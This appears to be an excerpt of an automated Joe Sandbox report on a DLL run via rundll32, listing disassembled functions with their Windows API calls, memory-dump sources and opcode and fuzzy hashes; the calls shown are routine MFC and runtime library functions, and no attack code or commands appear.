                                                                                                                      • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                        • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                        • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                      • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 317715441-0
                                                                                                                      • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                      • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                      • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                        • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                        • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                        • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 168474834-0
                                                                                                                      • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                      • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                      • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1151147025-0
                                                                                                                      • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                      • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                      • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2841959276-0
                                                                                                                      • Opcode ID: 5a69a964b2229b4de645fa0737a3e44a531c48ca18053bc0dcb6ac84ec84f31a
                                                                                                                      • Instruction ID: 14de686d86220a01eaba4d8e7e4af7f56c4348460245bd7539e940c5f7eef93d
                                                                                                                      • Opcode Fuzzy Hash: 5a69a964b2229b4de645fa0737a3e44a531c48ca18053bc0dcb6ac84ec84f31a
                                                                                                                      • Instruction Fuzzy Hash: 99B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                      • _memset.LIBCMT ref: 10029DA5
                                                                                                                        • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                        • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                        • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2905758408-0
                                                                                                                      • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                      • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                      • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                      • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3574576181-0
                                                                                                                      • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                      • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                      • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                      • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                      • String ID: Software\
                                                                                                                      • API String ID: 3878845136-964853688
                                                                                                                      • Opcode ID: e4b2c3dc710f06344b799a6377126916f2dd4417048af34eff523a2566a4e52d
                                                                                                                      • Instruction ID: 3e7de1aae869807147311e9c912979647593f3c49cbedc2fe1c34f8f1305fccc
                                                                                                                      • Opcode Fuzzy Hash: e4b2c3dc710f06344b799a6377126916f2dd4417048af34eff523a2566a4e52d
                                                                                                                      • Instruction Fuzzy Hash: 2641BD35900219DBDF11DBA4CC85AEFB7F9EF49300F10052AF551E7290DB74AA84CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 1001AC38
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                      • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                      • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                      • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                      • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2853195852-0
                                                                                                                      • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                      • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                      • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                      • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3219385341-0
                                                                                                                      • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                      • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                      • GetParent.USER32(?), ref: 1002A22C
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                      • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                      • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$LongParentVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 506644340-0
                                                                                                                      • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                      • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                      • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                      • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                      • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                      • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                        • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                      • String ID: V&'
                                                                                                                      • API String ID: 1067611704-802299783
                                                                                                                      • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                      • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                        • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2004563703-0
                                                                                                                      • Opcode ID: bbfc80b82c06ce06fa3432dd8c84df72dbde6e28130cc3a92eea8503f98b2c83
                                                                                                                      • Instruction ID: 36031bf0d5d502a9a7c8cde16f4ed6c3aebd0fb21a6c22909054b64381bbc268
                                                                                                                      • Opcode Fuzzy Hash: bbfc80b82c06ce06fa3432dd8c84df72dbde6e28130cc3a92eea8503f98b2c83
                                                                                                                      • Instruction Fuzzy Hash: 35216DB4D04299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00C765
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
